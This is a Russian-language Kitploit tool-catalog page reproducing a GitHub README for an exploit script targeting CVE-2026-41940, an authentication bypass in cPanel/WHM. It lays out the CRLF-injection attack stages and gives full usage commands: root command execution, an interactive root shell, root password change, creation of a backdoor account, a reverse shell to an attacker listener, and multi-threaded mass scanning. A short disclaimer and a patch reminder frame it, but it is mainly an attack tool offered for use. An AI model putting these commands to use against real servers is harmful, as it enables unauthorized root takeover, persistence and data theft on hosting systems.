Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940 — Обход аутентификации cPanel/WHM (уязвимость нулевого дня) | Kitploit
Инструменты/GitHubGitHub/0xyur1/cve-2026-41940
Аутентификация и авторизацияСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьТестирование на ПроникновениеАутентификацияRed Teaming
GitHub0xyur1/cve-2026-41940

CVE-2026-41940

Обход аутентификации cPanel/WHM (уязвимость нулевого дня)

1023 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2026-41940: Обход аутентификации cPanel/WHM (одна и несколько целей)

Отказ от ответственности: Этот документ и сопутствующий скрипт (exploit.py) предоставлены строго в образовательных целях, для исследований в области безопасности и авторизованного тестирования на проникновение. Не используйте это программное обеспечение против систем, которыми вы не владеете или для тестирования которых у вас нет явного разрешения.

Обзор

exploit.py — это скрипт, демонстрирующий уязвимость обхода аутентификации (CVE-2026-41940) в cPanel и WHM. Уязвимость позволяет неаутентифицированному злоумышленнику внедрить root-сессию в кэш демона через недостаток CRLF-инъекции, что в конечном итоге предоставляет доступ к WHM уровня root без необходимости действительных учётных данных.

Анализ уязвимости и ход эксплуатации

Эксплойт работает путём использования уязвимости CRLF-инъекции (Carriage Return Line Feed) в механизме обработки базовой аутентификации в сочетании с дефектом распространения сессии. Скрипт автоматизирует атаку в четыре этапа:

  1. Выпуск сессии до аутентификации: Подключается к публичным конечным точкам входа (например, /login/ или /cgi/login.cgi) для получения базовой неаутентифицированной сессионной cookie (whostmgrsession).
  2. CRLF-инъекция: Отправляет специально сформированный заголовок Basic Authentication, содержащий payload в Base64-кодировке, который внедряет поля root-сессии непосредственно в кэш сессий cpsrvd. Ответ сервера с перенаправлением раскрывает сгенерированный токен безопасности (cpsess).
  3. Распространение сессии: Исходная сессионная cookie отправляется на аутентифицированную конечную точку WHM, что запускает do_token_denied для распространения поддельной сессии в кэш демона — превращая её в действительную аутентифицированную сессию.
  4. Проверка: Обращается к ограниченным конечным точкам API WHM (например, /json-api/version) с использованием поддельной сессии для подтверждения доступа уровня root.

Предварительные требования

  • Python 3.x
  • Библиотека requests
root@kitploit:~
pip install requests

Использование

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Аргументы

Выбор цели

АргументОписание
--target URLОдин URL WHM (например, https://target:2087)
--target-file FILEФайл с целями (по одному ip:port в строке) — автоматически включает режим проверки

Сетевые и основные параметры

Параметры эксплуатации (после обхода)

Параметры вывода

АргументОписание
--output FILEСохранить сессионный токен и сведения в JSON-файл

Примеры

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Команды интерактивной оболочки

При использовании --shell доступны следующие команды:


Напоминание

Немедленно установите последние исправления безопасности cPanel/WHM.

Скачать инструмент
АргументОписание
--threads NКоличество одновременных потоков в многоцелевом режиме (по умолчанию: 10)
--hostname HOSTПереопределить заголовок Host — используйте, если автоматическое обнаружение не сработало или дало неверное имя хоста
--timeout NТайм-аут на запрос в секундах (по умолчанию: 15)
--retries NКоличество повторов при сетевых ошибках (по умолчанию: 3)
--cookie-name NAMEПринудительно задать имя сессионной cookie (автоопределяется, если не указано)
--no-verifyПропустить проверку на этапе 4 и продолжить в любом случае
АргументОписание
--checkРежим только проверки — проверить уязвимость без эксплуатации (автоматически задаётся с --target-file)
--password PASSИзменить root-пароль на PASS
--api FUNCВызвать конкретную функцию WHM JSON-API
--api-params K=V,...Параметры через запятую для --api
--exec CMDВыполнить команду ОС через WHM scripts/run_script (запасной вариант: rawexec)
--sessionСгенерировать root-ссылку для входа в один клик — открывайте немедленно, токен истекает быстро
--shellЗапустить интерактивную оболочку WHM (только для одной цели)
--dumpВывести информацию о сервере: версия, учётные записи, DNS-зоны, привилегии
--add-user USER PASS DOMAINСоздать новую учётную запись cPanel
--revshell LHOST LPORTОтправить обратную bash-оболочку на ваш слушатель
КомандаОписание
api <function> [k=v ...]Вызвать функцию WHM JSON-API (например, api version)
exec <command>Выполнить команду ОС через WHM (например, exec id)
passwd <newpass>Изменить root-пароль
dumpВывести информацию о сервере
revshell <lhost> <lport>Отправить обратную оболочку
add <user> <pass> <domain>Создать учётную запись cPanel
save <path>Сохранить текущую сессию в файл
exit / quitВыйти из оболочки